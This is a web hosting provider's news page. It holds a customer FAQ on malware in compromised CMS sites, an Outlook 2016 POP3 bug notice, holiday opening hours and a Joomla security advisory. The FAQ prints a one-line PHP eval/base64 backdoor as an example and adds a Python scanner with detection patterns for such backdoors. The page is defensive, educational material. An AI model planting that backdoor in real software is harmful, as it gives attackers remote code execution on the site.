MyHost.IE - Internet Services

My site contains malware, what does that mean?

 


I've just received notification of malware on my site. What does it mean?

This essentially means that your website's security has been compromised and malicious files have been uploaded to your site's folders. Once those files have been uploaded, they've probably been run automatically. This usually results in more files being downloaded to your site's folders and further code being injected into your files. The injected code, known as a ‘backdoor’, gives the attacker continued access to the site even if the initial vulnerability is detected and secured.

How did this happen?

Websites are now mostly built on Content Management Systems (CMS) like WordPress or Joomla, to name the two most popular. These are programs that provide a framework on which you can build a website. These CMSs use themes and plugins to further customise the site to get the look and operation you want. As the code in these matures, more and more vulnerabilities are discovered. Attackers then exploit these vulnerabilities to upload or inject code into your site so that they can access it.

Why do they do this?

There are many reasons, but mostly it gives them free access to a server. They can then use the server to send spam mail, participate in a DDoS attack, attempt to hack another server, and so on. This is now quite a large illegal industry.

What should I do to prevent this from happening?

Keep your site's code (core, themes, plugins) up to date. This ensures that at least older vulnerabilities are patched and secured. If you are not the site's developer, then put a service contract in place with your developer to manage updates for your site.

If your site is important to your business then use a proxy firewall. We recommend CloudProxy: http://www.myhost.ie/hosting/website-firewall/ This routes all traffic to your site via their servers, where malicious requests can be filtered out. It also secures your site against outdated code, as it virtually patches your site's code so that it seems up to date to any would-be attacker.

What to do if my site is hacked?

Always have a backup of your site. We cannot stress this enough. We do back up our servers on a 7-day rolling backup system; however, your site may have been compromised for some time before it was noticed, which renders our backups useless to you. We do offer a backup service for clients who wish to maintain backups over a longer time period. Please contact sales@myhost.ie regarding this.

If you don’t have access to a known clean backup of your site we would recommend using the Malware Removal Service described here: http://www.myhost.ie/hosting/malware-removal/

This is a year-long product that scans all your files and your database and removes any malware code that was injected into them. A scan is run daily on your site and any malware detections are reported to us and cleaned. You would be notified once the site is cleaned with the list of infected files and recommended steps to secure the site. We would limit access to your site so that no further malware can be uploaded. Once they have cleaned your site, we can give access to you or your developer to update and secure the site before releasing it to the public.

If your site has been compromised and you do not have a known clean backup, then we would recommend the Malware Removal Service. Updating a site that has already been compromised, without taking appropriate steps, is a waste of time and effort and usually results in the site being hacked again via a backdoor left on the site from the initial compromise.

Why was my site disabled?

This is not a step we take lightly. However, if your site is on shared hosting and is compromised, then we have no option but to protect the server's reputation and in turn the reputation of our other clients' websites. On a shared server you are sharing the IP address with the other sites on that server. If that IP address gets blacklisted, then all the clients' websites on that IP address are also blacklisted. Disabling access to a site does two things: it prevents the malware uploaded to your site from being used to carry out further attacks or send spam, which would result in the server's IP address being blacklisted, and it prevents your site from being further compromised.

What does malware look like?

An example of a backdoor:

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

This single line of code is found in a file added to the site's code by hackers, frequently disguised as part of a plugin or a theme. When the file is requested, they can execute any PHP code contained in the variable ‘e’ on the site. So if you have a site that has a few hundred PHP files, you can imagine trying to find that one line. This is why we recommend using http://www.myhost.ie/hosting/malware-removal/
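A starting point for finding that one line among a few hundred PHP files, as an added example (not MyHost.IE's code and not the Malware Removal Service's scanner). The function lists in the patterns and the sample site layout are assumptions made for this illustration:

```python
import re
import tempfile
from pathlib import Path

# Heuristics for the backdoor shown above: dynamic code execution fed by a
# decoder or by request data. Assumed patterns, not a full signature set.
EXEC_CALL = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
USER_INPUT = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")

def scan_line(line):
    """Return the reasons a line looks like a backdoor, or [] if it does not."""
    if not EXEC_CALL.search(line):
        return []  # a decoder or request variable alone is normal PHP
    reasons = []
    if DECODER.search(line):
        reasons.append("eval of decoded data")
    if USER_INPUT.search(line):
        reasons.append("eval of request input")
    return reasons

def scan_tree(root):
    """Walk root and return (relative path, line number, reasons) per hit."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(errors="replace")
        for number, line in enumerate(text.splitlines(), start=1):
            reasons = scan_line(line)
            if reasons:
                hits.append((path.relative_to(root).as_posix(), number, reasons))
    return hits

def build_sample_site(root):
    """Constructed sample: two clean files and one carrying the backdoor line."""
    plugin = Path(root) / "wp-content" / "plugins" / "gallery"
    plugin.mkdir(parents=True)
    (Path(root) / "index.php").write_text("<?php\nrequire 'wp-blog-header.php';\n")
    (plugin / "gallery.php").write_text("<?php\n$img = base64_decode($row['thumb']);\n")
    (plugin / "cache.php").write_text(
        "<?php\n// cache helper\n"
        "$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for rel, number, reasons in scan_tree(site):
            print(f"{rel}:{number}: {', '.join(reasons)}")
```

A hit is a lead for manual review rather than proof, since some legitimate code also calls these functions. Backdoors that hide the function names through string concatenation or further encoding will not match these patterns.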

 

To avoid the expense and pain of having to deal with malware on your site, keep it up to date (core, themes, plugins etc.) and keep a known clean backup of your site. If you want us to look after your backups for you, then contact sales@myhost.ie and we can provide you with a few solutions.

 

Outlook 2016 deleting mail after download


 

If you have the most recent Office 365 update installed (version 16.0.6568.2025), your emails may get deleted from the server or you may receive duplicate emails in your inbox.

The Outlook team is aware of the problem and actively investigating the issues. We’ll update this post and KB 3145116 as more information becomes available.

For now, please try workaround steps provided in this article (KB 3145116):

  • Configuring your email account to use IMAP settings instead of POP3 (only if your email provider supports this).
    OR
  • Reverting to an earlier version of Office 2016 via uninstall of latest update.

IMPORTANT If you disabled the “Remove from server after <x> days” option in Outlook 2016 to fix the delete email issue you’re probably now getting duplicate emails in your inbox. To avoid both problems, please re-enable the “Remove from server” option and use one of the other workarounds listed in the KB article.

UPDATE 4/3/2016: From Microsoft, “We have a fix for both POP3 bugs: duplicate emails and server-side mail deletion. The fix should roll out in the next couple of days, and once it’s available, we’ll let you know.”

UPDATE 08/3/2016: From Microsoft, “We are in the process of rolling out an Office update now (version 16.0.6568.2036), which will fix the POP3 bugs.”

Christmas Opening Hours 2015

Our Christmas opening hours are detailed below. During the holidays our helpdesk will still be open 24×7.
We would like to take this opportunity to wish all our customers a Happy Christmas and New Year!

Wednesday 23rd 9:00 – 13:00
Thursday 24th Closed
Friday 25th Closed

Monday 28th Closed
Tuesday 29th Open 9:00 – 13:00
Wednesday 30th Open 9:00 – 13:00
Thursday 31st Open 9:00 – 13:00
Friday 1st Closed

Please note that the deadline for completing new .IE applications is Tuesday 22nd December.

The IEDR, who are the official .ie registrar, will be closed from Wednesday December 23rd 2015 until Monday January 4th 2016.
Customers can still place orders for new registrations; however, during this period we will be unable to complete any .ie domain name registrations and modifications.

Joomla Security update

Security Notice: Joomla 3.4.6 Security Release

 

 

On December 14, the Joomla project released version 3.4.6. This fixes a highly critical security vulnerability that affects Joomla 1.5 through 3.4.5. This vulnerability can be exploited by attackers to remotely execute code.

If you are using the old (unsupported) versions 1.5.x and 2.5.x, you have to apply the hotfixes from here. This article from OSTraining explains how to apply them.

This critical vulnerability can be exploited to extract a browser cookie which can be used to provide the attacker with administrator privileges. If that cookie is loaded into the browser, the hacker can gain access to the back end of the website and can access the administrator control panel. The code required to exploit the vulnerability has already been posted online.

Once access has been gained, files can be downloaded including confidential customer information. Since Joomla is used to create e-commerce websites, customers who have previously purchased products through Joomla websites could have their confidential information stolen.

It is therefore imperative that all administrators of Joomla sites update their website software immediately and patch the critical Joomla vulnerability in order to secure their sites.

We do offer customers a malware cleanup service, Sucuri Malware Cleanup and Blacklist Removal: http://www.myhost.ie/hosting/malware-removal/

We also offer a website firewall service which actively prevents these sorts of attack: http://www.myhost.ie/hosting/website-firewall/

This will actively protect your website by monitoring website traffic and dropping malicious connections. It also prevents attacks on vulnerable outdated sites using ‘Virtual Website Patching’, which means the site appears fully up to date to any malicious connections.

Great Scott!!
